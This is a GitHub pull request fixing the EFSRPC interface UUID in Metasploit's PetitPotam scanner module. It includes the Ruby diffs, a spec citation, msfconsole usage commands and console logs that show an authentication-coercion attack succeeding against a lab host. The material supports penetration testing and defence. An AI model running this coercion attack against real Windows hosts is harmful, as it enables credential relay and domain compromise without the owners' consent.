### PR TITLE
Fix PetitPotam UUID when using EsfRPC with `lsarpc` named pipe

### DIFF
--- a/modules/auxiliary/scanner/dcerpc/petitpotam.rb
+++ b/modules/auxiliary/scanner/dcerpc/petitpotam.rb
@@ -9,6 +9,12 @@ require 'ruby_smb/error'
 require 'ruby_smb/dcerpc/lsarpc'
 require 'ruby_smb/dcerpc/efsrpc'
 
+module RubySMB::Dcerpc::EfsrpcOverLsarpc
+  include RubySMB::Dcerpc::Efsrpc
+
+  UUID = RubySMB::Dcerpc::Efsrpc::LSARPC_UUID
+end
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB::Client::Authenticated
@@ -20,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
   # Efsrpc and it's normal UUID
   PIPE_HANDLES = {
     lsarpc: {
-      endpoint: RubySMB::Dcerpc::Lsarpc,
+      endpoint: RubySMB::Dcerpc::EfsrpcOverLsarpc,
       filename: 'lsarpc'.freeze
     },
     efsrpc: {

--- a/modules/auxiliary/scanner/dcerpc/petitpotam.rb
+++ b/modules/auxiliary/scanner/dcerpc/petitpotam.rb
@@ -9,13 +9,14 @@ require 'ruby_smb/error'
 require 'ruby_smb/dcerpc/lsarpc'
 require 'ruby_smb/dcerpc/efsrpc'
 
-module RubySMB::Dcerpc::EfsrpcOverLsarpc
-  include RubySMB::Dcerpc::Efsrpc
-
-  UUID = RubySMB::Dcerpc::Efsrpc::LSARPC_UUID
-end
-
 class MetasploitModule < Msf::Auxiliary
+
+  module EfsrpcOverLsarpc
+    include RubySMB::Dcerpc::Efsrpc
+
+    UUID = RubySMB::Dcerpc::Efsrpc::LSARPC_UUID
+  end
+
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB::Client::Authenticated
   include Msf::Auxiliary::Scanner
@@ -26,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
   # Efsrpc and it's normal UUID
   PIPE_HANDLES = {
     lsarpc: {
-      endpoint: RubySMB::Dcerpc::EfsrpcOverLsarpc,
+      endpoint: EfsrpcOverLsarpc,
       filename: 'lsarpc'.freeze
     },
     efsrpc: {


### PR DESCRIPTION
According to [3.1.4.2 EFSRPC Interface](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451), the UUID to bind to is different according to which server interface is used:

> These calls are received at the well-known endpoint of the named pipe \pipe\lsarpc or \pipe\efsrpc. The server interface for \pipe\lsarpc MUST be identified by UUID [c681d488-d850-11d0-8c52-00c04fd90f7e], version 1.0. The server interface for \pipe\efsrpc MUST be identified by UUID [df1941c5-fe89-4e79-bf10-463657acf44d], version 1.0.


The current implementation of PetitPotam uses the LsaRPC UUID (`12345778-1234-abcd-ef00-0123456789ab`) when EsfRPC is used with the `lsarpc` named pipe. It should be `c681d488-d850-11d0-8c52-00c04fd90f7e` instead.

This PR fixes this by adding a specific class (`EfsrpcOverLsarpc`), overriding the `UUID` constant.

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/dcerpc/petitpotam`
- [ ]  `run verbose=true rhosts=<remote host> SMBUser=<username> SMBPass=<password> SMBDomain=<domain if needed>`
- [ ] **Verify** you get the message `Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful`

### Before this fix
```
msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
[*] 192.168.232.111:445   - Binding to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Bound to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.232.111:445   - Error: 192.168.232.111: RubySMB::Dcerpc::Error::FaultError A fault occurred
[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### After the fix
```
msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
[*] 192.168.232.111:445   - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.232.111:445   - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[+] 192.168.232.111:445   - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```